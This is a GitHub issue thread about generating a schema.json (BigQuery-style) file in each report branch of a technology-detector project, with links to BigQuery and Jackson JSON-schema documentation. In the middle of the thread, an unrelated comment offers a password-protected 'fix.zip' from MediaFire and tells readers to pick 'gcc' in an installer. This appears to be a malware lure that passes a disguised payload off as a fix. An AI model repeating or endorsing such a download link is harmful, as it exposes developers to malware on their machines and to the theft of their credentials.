### ISSUE TITLE
In each report branch, generate a schema.json file

### ISSUE THREAD

**Issue by Riduidel** [Riduidel/aadarchi-technology-detector#63]
This file should be in the branch base directory and should contain the data schema

**Comment by Riduidel** [comment]
Google BigQuery documentation is quite complete https://cloud.google.com/bigquery/docs/schemas#specifying_a_json_schema_file (but the file will be named `schema.bigquery.json)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Riduidel** [comment]
Now we have moved to jackson, we can use [jackson-json-schema](https://github.com/FasterXML/jackson-module-jsonSchema) to have a json schema generated
